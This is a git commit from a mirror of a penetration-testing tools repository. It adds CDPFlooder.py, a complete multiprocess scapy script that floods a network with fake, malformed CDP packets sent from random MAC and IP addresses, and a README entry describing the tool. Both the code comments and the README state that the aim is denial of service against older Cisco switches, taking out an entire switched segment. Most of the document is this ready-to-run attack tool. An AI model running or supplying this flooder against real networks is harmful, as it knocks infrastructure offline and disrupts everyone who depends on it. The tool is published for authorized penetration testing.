mirror of
https://github.com/mgeeky/Penetration-Testing-Tools.git
synced 2024-11-22 02:21:36 +01:00
Added CDPFlooder.py
This commit is contained in:
parent
bc7a5fe4f9
commit
6687dc7888
276
networks/CDPFlooder.py
Executable file
276
networks/CDPFlooder.py
Executable file
@ -0,0 +1,276 @@
|
|||||||
|
#!/usr/bin/python
|
||||||
|
|
||||||
|
#
|
||||||
|
# Effective CDP Flooder reaching about 1.7-2.1MiB/s (6-7,5K pps) triggering Denial of Service
|
||||||
|
# on older network switches and routers like Cisco Switch C2960.
|
||||||
|
# (p.s. Yersinia reaches up to even 10-12MiB/s - 65K pps!)
|
||||||
|
#
|
||||||
|
# Python requirements:
|
||||||
|
# - scapy
|
||||||
|
#
|
||||||
|
# Mariusz B. / mgeeky, '18, <mb@binary-offensive.com>
|
||||||
|
#
|
||||||
|
|
||||||
|
import sys
|
||||||
|
import struct
|
||||||
|
import string
|
||||||
|
import random
|
||||||
|
import argparse
|
||||||
|
import multiprocessing
|
||||||
|
|
||||||
|
try:
|
||||||
|
from scapy.all import *
|
||||||
|
except ImportError:
|
||||||
|
print('[!] Scapy required: pip install scapy')
|
||||||
|
sys.exit(1)
|
||||||
|
|
||||||
|
VERSION = '0.1'
|
||||||
|
|
||||||
|
config = {
|
||||||
|
'verbose' : False,
|
||||||
|
'interface' : None,
|
||||||
|
'packets' : -1,
|
||||||
|
'processors' : 8,
|
||||||
|
'source' : '',
|
||||||
|
|
||||||
|
# CDP Fields
|
||||||
|
'cdp-platform' : 'Cisco 1841',
|
||||||
|
|
||||||
|
# Software version - at most 199 chars.
|
||||||
|
'cdp-software-version' : '''Cisco IOS Software, 1841 Software (C1841-ADVSECURITYK9-M), Version 12.3(11)T2, RELEASE SOFTWARE (fc1)
|
||||||
|
Copyright (c) 1986-2004 by Cisco Systems, Inc.
|
||||||
|
Compiled Thu 28-Oct-04 21:09 by cmong''',
|
||||||
|
|
||||||
|
# Interface taking up
|
||||||
|
'cdp-interface' : 'FastEthernet0/1',
|
||||||
|
}
|
||||||
|
|
||||||
|
stopThreads = False
|
||||||
|
|
||||||
|
|
||||||
|
#
|
||||||
|
# ===============================================
|
||||||
|
#
|
||||||
|
|
||||||
|
class Logger:
|
||||||
|
@staticmethod
|
||||||
|
def _out(x):
|
||||||
|
if config['verbose']:
|
||||||
|
sys.stdout.write(x + '\n')
|
||||||
|
|
||||||
|
@staticmethod
|
||||||
|
def out(x):
|
||||||
|
Logger._out('[.] ' + x)
|
||||||
|
|
||||||
|
@staticmethod
|
||||||
|
def info(x):
|
||||||
|
Logger._out('[?] ' + x)
|
||||||
|
|
||||||
|
@staticmethod
|
||||||
|
def err(x):
|
||||||
|
sys.stdout.write('[!] ' + x + '\n')
|
||||||
|
|
||||||
|
@staticmethod
|
||||||
|
def fail(x):
|
||||||
|
Logger._out('[-] ' + x)
|
||||||
|
|
||||||
|
@staticmethod
|
||||||
|
def ok(x):
|
||||||
|
Logger._out('[+] ' + x)
|
||||||
|
|
||||||
|
def cdpDeviceIDgen(size=2, chars=string.ascii_uppercase + string.digits + string.ascii_lowercase):
|
||||||
|
return ''.join(random.choice(chars) for x in range(size))
|
||||||
|
|
||||||
|
|
||||||
|
def generatePacket():
|
||||||
|
#
|
||||||
|
# Parts of this function were taken from source code of 'cdp_flooder.py' by Chris McNab
|
||||||
|
# Network Security Assessment: Know Your Network
|
||||||
|
#
|
||||||
|
|
||||||
|
softVer = config['cdp-software-version'][:199]
|
||||||
|
platform = config['cdp-platform'][:-4]
|
||||||
|
iface = config['cdp-interface']
|
||||||
|
deviceID = cdpDeviceIDgen(8)
|
||||||
|
srcIP = Net(config['source']).choice()
|
||||||
|
caps = random.randint(1, 65)
|
||||||
|
|
||||||
|
etherframe = Ether() #Start definition of Ethernet Frame
|
||||||
|
etherframe.dst = '01:00:0c:cc:cc:cc' #Set Ethernet Frame destination MAC to Ciscos Broadcast MAC
|
||||||
|
etherframe.src = RandMAC() #Set Random source MAC address
|
||||||
|
etherframe.type = 0x011e #CDP uses Type field for length information
|
||||||
|
|
||||||
|
llcFrame = LLC() #Start definition of Link Layer Control Frame
|
||||||
|
llcFrame.dsap = 170 #DSAP: SNAP (0xaa) IG Bit: Individual
|
||||||
|
llcFrame.ssap = 170 #SSAP: SNAP (0xaa) CR Bit: Command
|
||||||
|
llcFrame.ctrl = 3 #Control field Frame Type: Unumbered frame (0x03)
|
||||||
|
|
||||||
|
snapFrame = SNAP() #Start definition of SNAP Frame (belongs to LLC Frame)
|
||||||
|
snapFrame.OUI = 12 #Organization Code: Cisco hex(0x00000c) = int(12)
|
||||||
|
snapFrame.code = 8192 #PID (EtherType): CDP hex(0x2000) = int(8192)
|
||||||
|
|
||||||
|
cdpHeader = CDPv2_HDR() #Start definition of CDPv2 Header
|
||||||
|
cdpHeader.vers = 1 #CDP Version: 1 - its always 1
|
||||||
|
cdpHeader.ttl = 255 #TTL: 255 seconds
|
||||||
|
|
||||||
|
cdpDeviceID = CDPMsgDeviceID() #Start definition of CDP Message Device ID
|
||||||
|
cdpDeviceID.type = 1 #Type: Device ID hex(0x0001) = int(1)
|
||||||
|
cdpDeviceID.len = 4 + len(deviceID) #Length: 6 (Type(2) -> 0x00 0x01) + (Length(2) -> 0x00 0x0c) + (DeviceID(deviceIdLen))
|
||||||
|
cdpDeviceID.val = deviceID #Generate random Device ID (2 chars uppercase + int = lowercase)
|
||||||
|
|
||||||
|
cdpAddrv4 = CDPAddrRecordIPv4() #Start Address Record information for IPv4 belongs to CDP Message Address
|
||||||
|
cdpAddrv4.ptype = 1 #Address protocol type: NLPID
|
||||||
|
cdpAddrv4.plen = 1 #Protocol Length: 1
|
||||||
|
cdpAddrv4.proto = '\xcc' #Protocol: IP
|
||||||
|
cdpAddrv4.addrlen = 4 #Address length: 4 (e.g. int(192.168.1.1) = hex(0xc0 0xa8 0x01 0x01)
|
||||||
|
cdpAddrv4.addr = str(srcIP) #Generate random source IP address
|
||||||
|
|
||||||
|
cdpAddr = CDPMsgAddr() #Start definition of CDP Message Address
|
||||||
|
cdpAddr.type = 2 #Type: Address (0x0002)
|
||||||
|
cdpAddr.len = 17 #Length: hex(0x0011) = int(17)
|
||||||
|
cdpAddr.naddr = 1 #Number of addresses: hex(0x00000001) = int(1)
|
||||||
|
cdpAddr.addr = [cdpAddrv4] #Pass CDP Address IPv4 information
|
||||||
|
|
||||||
|
cdpPortID = CDPMsgPortID() #Start definition of CDP Message Port ID
|
||||||
|
cdpPortID.type = 3 #type: Port ID (0x0003)
|
||||||
|
cdpPortID.len = 4 + len(iface) #Length: 13
|
||||||
|
cdpPortID.iface = iface #Interface string
|
||||||
|
|
||||||
|
cdpCapabilities = CDPMsgCapabilities() #Start definition of CDP Message Capabilities
|
||||||
|
cdpCapabilities.type = 4 #Type: Capabilities (0x0004)
|
||||||
|
cdpCapabilities.len = 8 #Length: 8
|
||||||
|
cdpCapabilities.cap = caps #Capability: Router (0x01), TB Bridge (0x02), SR Bridge (0x04), Switch that provides both Layer 2 and/or Layer 3 switching (0x08), Host (0x10), IGMP conditional filtering (0x20) and Repeater (0x40)
|
||||||
|
|
||||||
|
cdpSoftVer = CDPMsgSoftwareVersion() #Start definition of CDP Message Software Version
|
||||||
|
cdpSoftVer.type = 5 #Type: Software Version (0x0005)
|
||||||
|
cdpSoftVer.len = 4 + len(softVer) #Length
|
||||||
|
cdpSoftVer.val = softVer
|
||||||
|
|
||||||
|
cdpPlatform = CDPMsgPlatform() #Statr definition of CDP Message Platform
|
||||||
|
cdpPlatform.type = 6 #Type: Platform (0x0006)
|
||||||
|
cdpPlatform.len = 4 + len(platform) #Length
|
||||||
|
cdpPlatform.val = platform #Platform
|
||||||
|
|
||||||
|
restOfCdp = cdpDeviceID / cdpAddr / cdpPortID / cdpCapabilities / cdpSoftVer / cdpPlatform
|
||||||
|
|
||||||
|
cdpGeneric = CDPMsgGeneric()
|
||||||
|
cdpGeneric.type = 0
|
||||||
|
cdpGeneric.len = 0
|
||||||
|
cdpGeneric.val = str(restOfCdp)
|
||||||
|
|
||||||
|
cdpGeneric2 = CDPMsgGeneric()
|
||||||
|
cdpGeneric2.type = struct.unpack('<H', platform[-4:-2])[0]
|
||||||
|
cdpGeneric2.len = struct.unpack('<H', platform[-2:])[0]
|
||||||
|
|
||||||
|
cdppacket = etherframe / llcFrame / snapFrame / cdpHeader / cdpGeneric / cdpGeneric2
|
||||||
|
return cdppacket
|
||||||
|
|
||||||
|
def flooder(num, packets):
|
||||||
|
Logger.info('Starting task: {}, packets num: {}'.format(num, len(packets)))
|
||||||
|
packetsGen = []
|
||||||
|
sock = conf.L2socket(iface = config['interface'])
|
||||||
|
sock.ins.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
|
||||||
|
sock.ins.setsockopt(socket.SOL_SOCKET, socket.SO_SNDBUF, 512)
|
||||||
|
|
||||||
|
for i in range(512):
|
||||||
|
packetsGen.append(generatePacket())
|
||||||
|
|
||||||
|
if len(packets) == 0:
|
||||||
|
while stopThreads != True:
|
||||||
|
try:
|
||||||
|
for p in packetsGen:
|
||||||
|
if stopThreads: raise KeyboardInterrupt
|
||||||
|
sock.ins.send(str(p))
|
||||||
|
except KeyboardInterrupt:
|
||||||
|
break
|
||||||
|
else:
|
||||||
|
for p in packets:
|
||||||
|
if stopThreads: break
|
||||||
|
try:
|
||||||
|
for pg in packetsGen:
|
||||||
|
if stopThreads: raise KeyboardInterrupt
|
||||||
|
sock.ins.send(str(pg))
|
||||||
|
except KeyboardInterrupt:
|
||||||
|
break
|
||||||
|
|
||||||
|
Logger.info('Stopping task: {}'.format(num))
|
||||||
|
sock.close()
|
||||||
|
|
||||||
|
def parseOptions(argv):
|
||||||
|
global config
|
||||||
|
|
||||||
|
print('''
|
||||||
|
:: CDP Flooding / Denial of Service tool
|
||||||
|
Floods the interface with fake, randomly generated CDP packets.
|
||||||
|
Mariusz B. / mgeeky '18, <mb@binary-offensive.com>
|
||||||
|
v{}
|
||||||
|
'''.format(VERSION))
|
||||||
|
|
||||||
|
parser = argparse.ArgumentParser(prog = argv[0], usage='%(prog)s [options]')
|
||||||
|
parser.add_argument('-i', '--interface', metavar='DEV', default='', help='Select interface on which to operate.')
|
||||||
|
parser.add_argument('-n', '--packets', dest='packets', metavar='NUM', default=-1, type=int, help='Number of packets to send. Default: infinite.')
|
||||||
|
parser.add_argument('-s', '--source', metavar='SRC', default='0.0.0.0/0', help='Specify source IP address/subnet. By default: random IP from 0.0.0.0/0')
|
||||||
|
parser.add_argument('-v', '--verbose', action='store_true', help='Display verbose output.')
|
||||||
|
|
||||||
|
cdp = parser.add_argument_group('CDP Fields', 'Specifies contents of interesting CDP fields in packets to send')
|
||||||
|
cdp.add_argument('--software', help = 'Software version')
|
||||||
|
cdp.add_argument('--platform', help = 'Device Platform')
|
||||||
|
cdp.add_argument('--cdpinterface', help = 'Device Interface')
|
||||||
|
|
||||||
|
args = parser.parse_args()
|
||||||
|
|
||||||
|
config['verbose'] = args.verbose
|
||||||
|
config['interface'] = args.interface
|
||||||
|
config['packets'] = args.packets
|
||||||
|
config['source'] = args.source
|
||||||
|
config['processors'] = multiprocessing.cpu_count()
|
||||||
|
|
||||||
|
if args.cdpinterface: config['cdp-interface'] = args.cdpinterface
|
||||||
|
if args.platform: config['cdp-platform'] = args.platform
|
||||||
|
if args.software: config['cdp-sofware-version'] = args.software
|
||||||
|
|
||||||
|
Logger.info('Will use {} processors.'.format(config['processors']))
|
||||||
|
|
||||||
|
return args
|
||||||
|
|
||||||
|
def main(argv):
|
||||||
|
global stopThreads
|
||||||
|
|
||||||
|
opts = parseOptions(argv)
|
||||||
|
if not opts:
|
||||||
|
Logger.err('Options parsing failed.')
|
||||||
|
return False
|
||||||
|
|
||||||
|
if os.getuid() != 0:
|
||||||
|
Logger.err('This program must be run as root.')
|
||||||
|
return False
|
||||||
|
|
||||||
|
load_contrib('cdp')
|
||||||
|
|
||||||
|
packetsLists = [[] for x in range(config['processors'])]
|
||||||
|
|
||||||
|
if config['packets'] > 0:
|
||||||
|
for i in range(config['packets']):
|
||||||
|
packetsLists[i % config['processors']].append(i)
|
||||||
|
|
||||||
|
jobs = []
|
||||||
|
|
||||||
|
for i in range(config['processors']):
|
||||||
|
task = multiprocessing.Process(target = flooder, args = (i, packetsLists[i]))
|
||||||
|
jobs.append(task)
|
||||||
|
task.daemon = True
|
||||||
|
task.start()
|
||||||
|
|
||||||
|
print('[+] Started flooding. Press CTRL-C to stop that.')
|
||||||
|
try:
|
||||||
|
while jobs:
|
||||||
|
jobs = [job for job in jobs if job.is_alive()]
|
||||||
|
except KeyboardInterrupt:
|
||||||
|
stopThreads = True
|
||||||
|
print('\n[>] Stopping...')
|
||||||
|
|
||||||
|
stopThreads = True
|
||||||
|
time.sleep(3)
|
||||||
|
|
||||||
|
if __name__ == '__main__':
|
||||||
|
main(sys.argv)
|
@ -1,5 +1,6 @@
|
|||||||
## Networks Penetration Testing related scripts, tools and Cheatsheets
|
## Networks Penetration Testing related scripts, tools and Cheatsheets
|
||||||
|
|
||||||
|
- **`CDPFlooder.py`** - CDP Flooding tool, intended to take out entire segment switched by some old Cisco switches, vulnerable to Denial of Service after receiving big amount of invalid CDP packets.
|
||||||
|
|
||||||
- **`dtpscan.py`** - DTP Scanner - simple script trying to determine type of configured switchport and DTP negotation mode in order to assist in VLAN Hopping attacks. ([gist](https://gist.github.com/mgeeky/3f678d385984ba0377299a844fb793fa))
|
- **`dtpscan.py`** - DTP Scanner - simple script trying to determine type of configured switchport and DTP negotation mode in order to assist in VLAN Hopping attacks. ([gist](https://gist.github.com/mgeeky/3f678d385984ba0377299a844fb793fa))
|
||||||
|
|
||||||
|
Loading…
Reference in New Issue
Block a user